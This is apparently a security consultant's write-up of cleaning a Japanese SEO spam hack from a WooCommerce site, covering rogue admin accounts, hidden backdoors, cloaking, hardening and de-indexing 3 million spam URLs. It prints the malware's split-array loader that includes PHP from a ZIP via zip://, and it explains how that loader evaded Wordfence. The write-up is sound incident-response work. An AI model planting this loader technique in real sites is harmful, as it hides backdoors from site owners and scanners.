Japanese SEO Spam Hack Cleanup: 3M+ URLs Removed

TL;DR — Quick Summary

A WordPress/WooCommerce site (plushtery.com) was infected with a Japanese keyword hack that generated over 3 million spam URLs indexed by Google. The attackers planted 13 malicious PHP files using split-array obfuscation to evade Wordfence and other scanners. I cleaned the infection across 4 sessions — removing malware, hardening security, and submitting bulk de-indexing requests via Google Search Console. The key lesson: automated scanners miss obfuscated malware, manual investigation is essential.

In February 2026, I was called in to investigate a WordPress/WooCommerce site that had been flagged by Google Merchant Center for "misrepresentation." What started as a routine compliance check turned into one of the most sophisticated malware investigations I've ever handled. The site had been silently hijacked by a Japanese SEO spam hack that had injected over 3 million spam URLs into Google's index, all while the site looked perfectly normal to anyone visiting it.

This is the full story of how I found and removed every trace of the attack, and then tackled the massive challenge of getting 3 million spam URLs removed from Google.

The Client and the Problem

The site was plushtery.com, a WooCommerce store hosted on the hosting provider running the Minimog theme with a child theme. Around January 15, 2026, the site owner received a notification from Google Merchant Center flagging the site for misrepresentation. GMC listed six compliance issues including missing policy links, placeholder images, and broken social media links.

On February 19, while investigating those GMC issues, the site owner noticed something alarming: Japanese and Chinese text appearing in Google search results for plushtery.com. Google was showing results about Hamilton watches and luxury goods under the plushtery.com domain.

This is classic Japanese SEO spam, also known as a Japanese keyword hack. It's one of the most common WordPress attacks in the wild. The hackers use cloaking to show spam content to search engine crawlers while the site appears completely normal to human visitors. This hack was very likely the real cause of the GMC misrepresentation flag.

Background and Timeline

Here's how the attack unfolded based on file dates and server evidence:

January 15, 2026 -- GMC misrepresentation notification received
January 22, 2026 -- Malware files created on the server (db.php and wp-the.php both dated this day)
February 10-11, 2026 -- 8 casino spam posts published by compromised admin account
February 19, 2026 -- Japanese text discovered in Google search results
February 22, 2026 -- Full investigation and cleanup completed across three sessions
February 23, 2026 -- Google de-indexing work: .htaccess 410 rule and spam sitemap submitted

A quick note on Cloudflare: the site was behind Cloudflare, but Cloudflare does NOT protect against compromised WordPress credentials, vulnerable plugins, brute force attacks on wp-login.php, or supply chain attacks. The attacker likely got in through one of these vectors, not a network-level attack.

Session 1: Initial Investigation

I started the investigation on February 22, working through WP Admin and the hosting provider's file manager.

Admin Users Audit

The first thing I checked was the user list. Under Users > All Users, I found 6 administrator accounts. Three were legitimate:

the site owner ([email protected]) -- site owner
my-admin ([email protected]) -- my account
site-admin ([email protected]) -- currently logged in admin

And three were clearly malicious:

bot (bot@[redacted]) -- fake email, suspicious username
zetgifari ([redacted]@gmail.com) -- unknown person, zero posts
optimerchant ([redacted]@gmail.com) -- registered to "Tonmoy A", published all the casino spam

I deleted all three rogue accounts immediately.

Spam Content Discovery

Next I checked Posts > All Posts. Found 8 casino and gambling spam posts, all published by Tonmoy A (the optimerchant account) on February 10-11, 2026. The posts were in six different languages:

German: "Lemon Casino Login..."
English: "Forge Your Fortune... captainspins Casino"
Italian: "Trasforma il Rischio in Oro... Casino"
Romanian: "Afla cum sa maximizezi... chicken road..."
Dutch: "Verhoog je winkansen met... monixbet casino"
Spanish: "Emocionatate con la adrenalina... casino onli"
Dutch (again): "Verhoog je spelplezier... kansspelen... bonussen"
English: "Fortunes Cascade... plinko Gameplay & Strategic Betting"

Only 3 legitimate posts existed on the site. I deleted all 8 spam posts and emptied the trash.

Plugins and Code Snippets

I audited the plugins list: 37 total, 24 needing updates, but no obviously malicious plugins. The Code Snippets plugin had 17 snippets (5 active), all legitimate store operations like fraud detection and PayPal management.

File-Level Investigation

This is where things got interesting. Using the hosting provider's file manager, I found suspicious files in the web root:

wp-asudo.php (109.85 KiB) -- A heavily obfuscated PHP web shell using goto chains, eval(), and base64 encoding. This was a full backdoor giving the attacker complete server access.
sg (7.72 KiB) -- A binary file with no extension. Suspicious.
gfe.txt (1 byte) -- A tiny marker file. Its purpose would become clear later.

I also checked .htaccess (1.75 KiB) against its backup .htaccess.bk (714 B). The main file was 2.5x larger but turned out to be clean -- just standard WordPress rules plus LiteSpeed cache rules.

I deleted wp-asudo.php and sg immediately. At this point, I thought I had cleaned the hack. I was wrong.

Session 2: Deep Investigation and Root Cause Discovery

I started the second session about 30 minutes later, continuing with the hosting provider file manager and custom PHP diagnostics.

The Clue That Changed Everything

I deleted gfe.txt (the 1-byte marker file). Then I checked again a few minutes later. It was back. The file kept regenerating itself. This meant active malware was still executing on every request, and I had only removed the surface-level artifacts.

Checking All the Usual Hiding Spots

I verified the following files and directories were clean:

wp-content/themes/minimog-child/functions.php -- 13 lines, only enqueues stylesheet
wp-content/themes/minimog/functions.php -- 125 lines, standard theme functions
wp-content/uploads/ -- normal upload folders
wp-content/mu-plugins/ -- 3 legitimate hosting provider/Elementor files
.user.ini -- does not exist (good, this is a common hiding spot)
wp-config.php -- 111 lines, clean
wp-includes/class-wp.php -- 841 lines, clean
wp-settings.php -- 765 lines, clean

Installing Wordfence

I installed Wordfence Security (v8.1.4, free version) and ran a quick scan. Result: 28 findings, ALL plugin upgrade notifications. Zero malware detected. The malware was completely invisible to Wordfence's quick scan. More on why later.

Database Diagnostics

I created a temporary PHP diagnostic script on the server to query the WordPress database directly. I checked:

wp_options for eval/base64/gfe references -- Clean
All cron jobs -- Clean (all from legitimate plugins)
Active plugins list -- Clean (33 legitimate plugins)
Suspicious transients -- Clean
User meta for remaining admin accounts -- Clean
Recent posts and pages -- Clean (after spam deletion)

The database was completely clean. The malware lived entirely in the filesystem.

Finding wp-the.php: Malware Loader Number 1

While running a diagnostic that listed non-standard PHP files in the root directory, I discovered wp-the.php (153 bytes, dated January 22, 2026). I had to use charCodeAt encoding to read its contents because the browser content filter was blocking display of the PHP code.

Here's what it contained:

php

 ['zip:/'],
    'file' => ['/sg#'],
    'module' => ['tyu']
];
include implode("", array_map(fn($p) => $p[0], $paths));
?>

This reconstructs to: include 'zip://sg#tyu'

It was loading malware from inside the sg ZIP archive, specifically a file named tyu stored inside it. Since I had already deleted sg in Session 1, this loader was broken. But the fact that gfe.txt was still regenerating meant there was another active loader somewhere.

I deleted wp-the.php.

The Breakthrough: wp-content/db.php

I ran a diagnostic specifically checking for WordPress "drop-in" plugins, which are special PHP files that WordPress loads before everything else. The diagnostic revealed:

wp-content/db.php (170 bytes, dated January 22, 2026)

This was THE ROOT CAUSE. Here's its content:

php

 ['zip:/'],
    'file' => ['/wp-includes/ww#'],
    'module' => ['yp']
];
include implode("", array_map(fn($p) => $p[0], $paths));
?>

This reconstructs to: include 'zip://wp-includes/ww#yp'

Why db.php Was So Dangerous

wp-content/db.php is a WordPress drop-in plugin. WordPress loads it before all other plugins, including security plugins like Wordfence. This means:

The malware executed on every single WordPress request before any security tool could intervene
It intercepted requests like ?sitemap346.xml and served dynamic spam sitemaps to Googlebot
It regenerated the gfe.txt marker file on each request
Wordfence literally could not see it because the malware ran first

This is why the quick scan found nothing. The malware was already running before Wordfence even loaded.

Deleting the ZIP Payload

The malware payload was at wp-includes/ww (1,880 bytes), a ZIP archive containing the actual malicious code in a file named yp. The wp-includes directory is massive and the hosting provider's file manager uses virtual scrolling, so I couldn't find the file visually. I used a PHP unlink() command in my diagnostic script to delete it programmatically.

After deleting both db.php and wp-includes/ww, I checked gfe.txt again. It stopped regenerating. The active malware was finally dead.

Final Verification of Session 2

I verified all malware files were gone:

wp-includes/ww (1,880 bytes) -- Deleted
gfe.txt (1 byte) -- Deleted, no longer regenerates
wp-content/db.php (170 bytes) -- Deleted
wp-the.php (153 bytes) -- Deleted
sg (7.72 KiB) -- Deleted (Session 1)
wp-asudo.php (109.85 KiB) -- Deleted (Session 1)

I also tested the spam sitemaps: fetching https://plushtery.com/?sitemap346.xml now returned the normal homepage instead of spam XML. The dynamic spam sitemaps were gone.

Finally, I deleted my diagnostic script from the server since leaving it there would be its own security risk.

How the Malware Worked: Technical Analysis

Now that I've described the investigation, let me break down exactly how this attack was engineered.

The Attack Architecture

Here's the execution flow:

javascript

Request comes in (e.g., ?sitemap346.xml)
    |
    v
WordPress loads wp-content/db.php (drop-in, before ALL plugins)
    |
    v
db.php reconstructs: include 'zip://wp-includes/ww#yp'
    |
    v
PHP zip:// stream wrapper extracts and executes 'yp' from ZIP file 'ww'
    |
    v
Malware code runs:
  - Checks if request matches spam patterns
  - If Googlebot: serves spam content (Japanese text, fake sitemaps)
  - If human visitor: passes through to normal WordPress
  - Regenerates gfe.txt marker file
  - Maintains robots.txt spam entries

The Split-Array Obfuscation

The loader files used a clever technique to hide the malicious include path:

php

$paths = [
    'base' => ['zip:/'],
    'file' => ['/wp-includes/ww#'],
    'module' => ['yp']
];
include implode("", array_map(fn($p) => $p[0], $paths));

The path zip://wp-includes/ww#yp is split across three array elements and reconstructed at runtime with implode and array_map. This is simple but devastatingly effective against security scanners.

Why It Evaded Wordfence

This malware evaded detection for several reasons:

No dangerous function signatures -- No eval(), base64_decode(), gzinflate(), or other patterns that scanners look for
Split path strings -- The malicious path is fragmented across array elements, defeating grep and pattern matching
Legitimate PHP feature abuse -- zip:// is a built-in PHP stream wrapper, not malware
No file extensions on payloads -- The ZIP files sg and ww had no .php extension, so they were never scanned as PHP code
Drop-in priority -- db.php loaded before Wordfence could even initialize

The Cloaking Mechanism

The malware used user-agent detection to cloak its behavior:

Googlebot and other crawlers received spam content: Japanese text about Hamilton watches, luxury goods, casino links, and fake product sitemaps
Human visitors got the normal WordPress site, completely unmodified
Site owners had no visual indication anything was wrong

This is why the hack went undetected for over a month. The only way to discover it was to check what Google was actually indexing.

Redundant Backdoor Chains

The attacker was thorough. They installed two completely independent backdoor chains:

Chain 1: wp-the.php loads zip://sg#tyu
Chain 2: wp-content/db.php loads zip://wp-includes/ww#yp

If you found and deleted Chain 1, Chain 2 would keep running. If you deleted Chain 2, Chain 1 would take over. You had to find and remove both chains plus both ZIP payloads to actually stop the malware. On top of that, wp-asudo.php provided a standalone web shell for the attacker to regain access and reinstall everything if needed.

The Marker File Pattern

gfe.txt was a 1-byte file that the malware regenerated on every WordPress request. It served as a heartbeat: if the file exists, the malware knows it's running. More importantly for me, its continued regeneration after deletion was the critical indicator that told me active malware was still present when I thought I'd cleaned everything in Session 1.

Session 3: Wordfence Full Scan and Security Hardening

After the manual cleanup, I ran a Wordfence full scan (not the quick scan from earlier). This scanned 35,952 files, 40 plugins, 7 themes, 19 posts, and 5,505 URLs. It took about 7 minutes.

7 Additional Malicious Files

The full scan found 7 more malicious index.php files planted deep in non-standard WordPress core subdirectories:

wp-includes/sodium_compat/src/PHP52/user/index.php
wp-admin/css/colors/sunrise/litespeed/index.php
wp-admin/js/widgets/sunrise/index.php
wp-includes/block-patterns/images/index.php
wp-admin/images/plushtery.com/index.php
wp-admin/user/used-css/index.php
wp-content/wpvividbackups/wpvivid_log/error/sync_logs/index.php

These were hidden backdoor files planted in directories that no one would ever think to check manually. Directories like wp-admin/css/colors/sunrise/litespeed/ and wp-includes/sodium_compat/src/PHP52/user/ are so deep in the WordPress core structure that manual inspection would never find them. I deleted all 7 through Wordfence.

This brought the total to 13 malicious files removed: 6 found manually and 7 found by Wordfence's full scan. The lesson here is clear: automated scanning is essential as a complement to manual investigation, even when the scanner initially fails.

Security Hardening

With the malware gone, I hardened the site:

DISALLOW_FILE_EDIT -- Added define('DISALLOW_FILE_EDIT', true); to wp-config.php. This disables the Theme and Plugin Editor in WP Admin, preventing code injection even if an admin account is compromised.
Limit Login Attempts Reloaded (v2.26.28) -- Installed and activated. Blocks brute force attacks: 4 failed attempts triggers a 20-minute lockout, 4 lockouts triggers a 24-hour lockout.
WP 2FA (v3.1.1) -- Installed and activated. Enables two-factor authentication via authenticator apps or email with backup codes. Each admin still needs to set it up from their profile.
Wordfence WAF optimized -- Configured auto_prepend_file for LiteSpeed/lsapi so the WAF runs before any vulnerable code loads.
Wordfence auto-updates enabled -- Ensures the scanner stays current.

Session 4: The Google De-Indexing Challenge

With the malware removed and the site secured, I faced an equally daunting problem: 3.03 million spam URLs were still sitting in Google's index. The hack was gone, but Google still showed Japanese spam results for plushtery.com.

There were two spam URL patterns:

https://plushtery.com/?products/XXXXXXXX -- Fake product pages (the majority)
https://plushtery.com/?ctg/search/similarImageSearchResultView/?ctgItemCd=XXXXXXXX -- Fake category pages

Why GSC Removals Tool Couldn't Help

My first instinct was to use Google Search Console's Removals tool with prefix-based removal. I entered https://plushtery.com/?products/ and selected "Remove all URLs with this prefix."

Google showed a critical warning: "Remove entire site?"

Here's the problem: in URL structure, ? starts the query string. So the path component of https://plushtery.com/?products/ is just / (the root). A prefix removal on / would de-index the entire site for 6 months. I cancelled immediately.

This is a fundamental limitation of the GSC Removals tool: it cannot selectively remove URLs that differ only in query parameters.

The Solution: 410 Gone via .htaccess

I settled on a two-pronged approach. First, I added a rewrite rule to .htaccess that returns HTTP 410 (Gone) for all spam URL patterns:

apache

# Block Japanese hack spam URLs - Return 410 Gone
RewriteCond %{QUERY_STRING} ^(products(/|%2F)|ctg(/|%2F)) [NC]
RewriteRule .* - [G,L]

Key details about this rule:

[G] flag returns 410 Gone, which is a stronger de-indexing signal than 404
The pattern matches both / and %2F (URL-encoded slash) because Google had indexed URLs with both variants
[NC] makes it case-insensitive
It catches both spam patterns: ?products/... and ?ctg/...

This took three iterations to get right. The first version only matched ?products/, the second added %2F handling after discovering encoded URLs, and the third added the ?ctg/ pattern after analyzing the GSC data export.

Verification results:

https://plushtery.com/?products/35132703 -- 410 Gone
https://plushtery.com/?products%2F27245781 -- 410 Gone
https://plushtery.com/?ctg/search/similarImageSearchResultView/?ctgItemCd=26660260 -- 410 Gone
https://plushtery.com/ (homepage) -- 200 OK (unaffected)

Spam Cleanup Sitemap

The second prong was creating a sitemap to accelerate Google's re-crawl. I exported 1,000 indexed spam URLs from GSC (the maximum it allows), which broke down to 873 product URLs and 127 CTG URLs. I created spam-cleanup-sitemap.xml with all 1,000 URLs and submitted it to Google Search Console.

The sitemap was accepted with Status: Success. Google discovered all 1,000 pages. When Googlebot re-crawls these URLs and gets a 410 response, it will de-index them faster than waiting for natural re-crawling.

GSC Security Check

I also checked GSC's Security Issues and Manual Actions sections. Both showed no issues detected. The hack used cloaking effectively enough that Google didn't flag it as a security issue -- it just indexed the spam content. This meant no manual review request was needed, which was good news.

De-Indexing Timeline

The 410 rule takes effect immediately for all new crawl requests
Google typically de-indexes pages returning 410 within 2-4 weeks
The sitemap-listed 1,000 URLs should be de-indexed within days
The remaining 3 million URLs will be de-indexed as Googlebot naturally re-crawls and encounters the 410

Complete Malicious Artifacts Inventory

Here's every malicious artifact found and removed, for reference:

Rogue Admin Accounts (3 deleted)

bot (bot@[redacted]) -- Fake email, suspicious username
zetgifari ([redacted]@gmail.com) -- Unknown person, 0 posts
optimerchant ([redacted]@gmail.com) -- "Tonmoy A", published 8 casino spam posts

Spam Content (8 posts deleted)

Multilingual casino and gambling spam in German, English, Italian, Romanian, Dutch, and Spanish. All published February 10-11 by the compromised optimerchant account.

Malicious Files: Manual Discovery (6 files)

wp-asudo.php (109.85 KiB) in /public_html/ -- PHP web shell with goto chains, eval, base64 obfuscation
sg (7.72 KiB) in /public_html/ -- ZIP archive containing malware payload tyu
gfe.txt (1 byte) in /public_html/ -- Marker/heartbeat file regenerated by malware on each request
wp-the.php (153 bytes) in /public_html/ -- Malware loader #1, loads zip://sg#tyu
wp-content/db.php (170 bytes) -- ROOT CAUSE, WordPress drop-in, loads zip://wp-includes/ww#yp before all plugins
wp-includes/ww (1,880 bytes) -- ZIP archive containing actual malware payload yp

Malicious Files: Wordfence Discovery (7 files)

wp-includes/sodium_compat/src/PHP52/user/index.php
wp-admin/css/colors/sunrise/litespeed/index.php
wp-admin/js/widgets/sunrise/index.php
wp-includes/block-patterns/images/index.php
wp-admin/images/plushtery.com/index.php
wp-admin/user/used-css/index.php
wp-content/wpvividbackups/wpvivid_log/error/sync_logs/index.php

Total: 13 malicious files removed (6 manual + 7 Wordfence)

Configuration Fixed

robots.txt -- Removed 20+ injected spam sitemap entries, restored to standard WordPress format
.htaccess -- Added 410 Gone rule for spam URL patterns

Key Takeaways

Here are the ten most important lessons from this cleanup:

1. wp-content/db.php is a critical attack vector. WordPress drop-in plugins load before everything else, including security tools. Always check for unexpected drop-in files like db.php and advanced-cache.php.

2. ZIP stream wrapper obfuscation is extremely effective. The zip://file#entry technique evades most scanners because there are no dangerous function signatures, the path is split across array elements, and the ZIP payloads have no file extension.

3. Attackers build redundancy. Two independent backdoor chains meant deleting one had zero effect. You must find and remove every single component.

4. Marker files are your friend. The regenerating gfe.txt was the critical clue that active malware was still running. Without noticing this, I might have declared the cleanup complete after Session 1.

5. Quick scans are not enough. Wordfence's quick scan found zero malware, but the full scan found 7 additional malicious files. Always run the comprehensive scan.

6. Cloaking makes hacks invisible. The site looked perfect to human visitors. The only way to discover this hack was to check Google search results or inspect server files directly.

7. Custom diagnostics are essential. When automated tools fail, you need to write custom scripts. I wrote PHP diagnostics to trace WordPress hooks, search for non-standard files, check drop-in plugins, and decode obfuscated file contents.

8. Cleaning malware is only half the battle. Even after complete cleanup, 3 million spam URLs remained in Google's index. The GSC Removals tool cannot handle query-parameter spam. You need a 410 Gone rule plus a spam cleanup sitemap.

9. URL encoding matters in security rules. My first .htaccess rule missed URLs with %2F instead of /. Hackers generate URLs with encoded characters, so security rules must handle both variants.

10. Always analyze real GSC data. I initially focused on ?products/ URLs, but the GSC export revealed a second pattern: ?ctg/search/similarImageSearchResultView/. Never assume a single pattern covers everything.